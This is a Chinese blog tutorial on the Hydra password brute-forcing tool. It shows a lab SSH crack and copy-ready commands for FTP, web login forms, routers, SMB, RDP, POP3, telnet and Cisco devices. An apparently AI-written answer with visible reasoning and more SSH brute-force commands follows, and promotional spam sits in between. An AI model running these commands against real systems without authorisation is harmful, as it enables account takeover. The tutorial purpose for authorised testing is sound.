【渗透测试】密码爆破工具——九头蛇(hydra)使用详解及实战,从零基础到精通,收藏这篇就够了!

.markdown-body pre,.markdown-body pre>code.hljs{color:#333;background:#f8f8f8}.hljs-comment,.hljs-quote{color:#998;font-style:italic}.hljs-keyword,.hljs-selector-tag,.hljs-subst{color:#333;font-weight:700}.hljs-literal,.hljs-number,.hljs-tag .hljs-attr,.hljs-template-variable,.hljs-variable{color:teal}.hljs-doctag,.hljs-string{color:#d14}.hljs-section,.hljs-selector-id,.hljs-title{color:#900;font-weight:700}.hljs-subst{font-weight:400}.hljs-class .hljs-title,.hljs-type{color:#458;font-weight:700}.hljs-attribute,.hljs-name,.hljs-tag{color:navy;font-weight:400}.hljs-link,.hljs-regexp{color:#009926}.hljs-bullet,.hljs-symbol{color:#990073}.hljs-built_in,.hljs-builtin-name{color:#0086b3}.hljs-meta{color:#999;font-weight:700}.hljs-deletion{background:#fdd}.hljs-addition{background:#dfd}.hljs-emphasis{font-style:italic}.hljs-strong{font-weight:700}

九头蛇hydra

记得美国队长中的大反派hydra(九头蛇)组织吗?

今天介绍的这款渗透测试工具,也叫这个名字。外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

hydra是著名组织thc的一款开源的暴力破解密码工具,功能非常强大

kali下是默认安装的,几乎支持所有协议的在线破解。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

密码能否破解,在于字典是否强大以及电脑的性能。

我们就介绍下,这个装备怎么用

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

使用方法
语法:Hydra 参数 IP 服务



外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

参数:
-l login 小写,指定用户名进行破解
-L file 大写,指定用户的用户名字典
-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。
-P file 大写,用于指定密码字典。
-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
-M file 指定目标ip列表文件,批量破解。
-o file 指定结果输出文件
-f 找到第一对登录名或者密码的时候中止破解。
-t tasks 同时运行的线程数,默认是16
-w time 设置最大超时时间,单位
-v / -V 显示详细过程
-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)
-x 自定义密码。



外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

service:指定服务名,支持的服务跟协议有:telnet,ftp,pop3等等。
注意点:1.自己创建字典,然后放在当前的目录下或者指定目录。
2.参数可以统一放在最后,格式比如hydra ip 服务 参数。
3.如果能确定用户名一项时候,比如web登录破解,直接用 -l就可以,然后剩余时间破解密码。
4.缺点,如果目标网站登录时候需要验证码就无法破解。
5.man hydra最万能。
6.或者hydra -U http-form等查看具体帮助。



外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

案例分析
暴破ssh登录密码
环境介绍
攻击机:kali
装有hydra工具

靶机:192.168.154.131
安装ssh服务,正常运行



外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

为了测试方便,我们创建两个简单的字典文件,如下:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

开始爆破

根据命令参数,组织参数格式如下:

root@kali:/mnt# hydra -L user.txt -P password.txt -t 2 -vV -e ns 192.168.154.131 ssh



外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

破解成功

因为字典数量比较少,我们可以轻易的破解成功,但是实际情况下,我们可能需要很久。

测试登录

使用得到的用户名/密码登录服务器,登录成功

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

各种协议破解汇总
FTP协议破解
破解ftp:

hydra -L 用户名字典 -P 密码字典 -t 6 -e ns IP地址 -v



外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

http协议破解
get方式提交,破解web登录:

hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns IP地址 http-get /admin/
hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns -f IP地址 http-get /admin/index.php

post方式提交,破解web登录:

hydra -f -l 用户名 -P 密码字典 -V -s 9900 IP地址 http-post-form "/admin/index.php?action=login:user=USER&pw=PASS:"

#/index.php …这个是登录的 url
#后门是POST的数据 其中的用户名密码使用 USER PASS 来代替
#然后是如果登录出错 会出现的字符 。。。然后开始破解



外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

https协议破解
破解https

hydra -m /index.php -l 用户名 -P 密码字典.txt IP地址 https



外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

路由器破解
hydra -l admin -x 6:10:1a.~!@#$%^&()-= -t 8 192.168.1.1 http-get /
-l admin 为尝试破解的用户名。

# -x 6:10:1a. 表示枚举的密码由 数字、小写字母和单字符’.'等等组成,长度为 6 - 10 位。-t 8 表示分 8 个并行任务进行爆破尝试。192.168.1.1 为 Router 地址。http-get 为破解方式(协议)



外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

http-proxy协议破解
破解http-proxy:

hydra -l admin -P 字典.txt http-proxy://IP地址



外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

smb破解
破解smb:

hydra -l 用户名字典 -P 密码字典 IP地址 smb



外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

Windows远程桌面
破解rdp(windows远程登录):

hydra ip地址 rdp -l administrator -P 密码字典.txt -V



外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

邮箱pop3
破解邮箱pop3:

hydra -l 用户名 -P 密码字典.txt my.pop3.mail pop3



外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

telnet破解
hydra ip地址 telnet -l 用户字典.txt -P 密码字典.txt -t 32 -s 23 -e ns -f -V



外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

语音通讯工具teamspeak
hydra -l 用户名字典 -P 密码字典.txt -s 端口号 -vV ip teamspeak



外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

cisco
hydra -P 密码字典 IP地址 cisco
hydra -m cloud -P 密码字典 IP地址 cisco-enable



题外话

黑客&网络安全如何学习**

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和网安大厂360共同研发的的网安视频教程,之前都是内部资源,专业方面绝对可以秒杀国内99%的机构和个人教学!全网独一份,你不可能在网上找到这么专业的教程。

内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频,200多G的资源,不用担心学不全。
在这里插入图片描述
因篇幅有限,仅展示部分资料,需要见下图即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
————————————————

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文转自 https://blog.youkuaiyun.com/A1_3_9_7/article/details/149336488?spm=1001.2014.3001.5502,如有侵权,请联系删除。

<think>嗯,用户问的是在Kali Linux里使用九头Hydra爆破SSH的方法。首先,我需要确认Hydra的基本用法和参数。Hydra是一个强大的网络登录破解工具,支持多种协议,包括SSH。用户可能需要知道如何安装、基本命令结构以及具体的参数设置。 然后,用户可能对SSH爆破的具体步骤不太清楚,比如如何指定目标IP、用户名列表、密码字典等。需要详细说明每个参数的作用,比如-l指定单个用户名,-L指定用户名字典,-p指定端口,-P指定密码字典,-t设置线程数,以及-vV显示详细输出。 还要提醒用户注意法律和道德问题,未经授权的攻击是非法的。可能需要给出一个示例命令,帮助用户理解如何组合这些参数。比如hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100 -t 4 -vV。 另外,用户可能不知道如何生成或获取密码字典,可以提到Kali自带的字典位置,比如/usr/share/wordlists/,或者建议使用crunch等工具生成自定义字典。同时,需要警告他们成功率取决于字典质量,强密码可能难以破解。 最后,要强调合法使用,建议仅在授权的环境中测试,并提醒如果SSH服务器启用了公钥认证或双因素认证,密码爆破可能无效。确保回答结构清晰,分步骤说明,避免使用复杂术语,让新手也能理解。</think>以下是在 Kali Linux 中使用 Hydra九头)进行 SSH 爆破的详细步骤说明: ----- ### 基础准备 1. 安装 Hydra: ```bash sudo apt update && sudo apt install hydra -y ``` 2. 准备字典文件: - 用户名字典(users.txt) - 密码字典(passwords.txt) - Kali 自带字典路径:`/usr/share/wordlists/` ----- ### 爆破命令结构 ```bash hydra -l <用户名> -P <密码字典路径> <目标IP> ssh [-s <端口>] [-t <线程数>] [-vV] ``` ----- ### 参数详解 1. **单用户爆破** ```bash hydra -l admin -P passwords.txt ssh://192.168.1.100 -t 4 -vV ``` - `-l admin`:指定用户名 - `-P passwords.txt`:密码字典路径 - `-t 4`:线程数(建议不超过 16) - `-vV`:显示详细过程 2. **多用户爆破** ```bash hydra -L users.txt -P passwords.txt ssh://192.168.1.100 -s 2222 ``` - `-L`:用户名字典 - `-s 2222`:非标准SSH端口时使用 ----- ### 实战示例 ```bash hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \ -P /usr/share/wordlists/rockyou.txt \ ssh://10.10.10.10 -t 16 -vV -f ``` - `-f`:找到首个有效凭证后立即停止 ----- ### 防御建议(供安全测试参考) 1. 启用 SSH 公钥认证 2. 设置失败登录锁定策略 3. 修改默认 SSH 端口 4. 使用 fail2ban 防御工具 ----- ### 法律声明 ⚠️ 该技术仅限授权渗透测试使用,未经许可攻击他人系统属于违法行为。《刑法》第285条明确规定非法侵入计算机信息系统最高可处七年有期徒刑。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值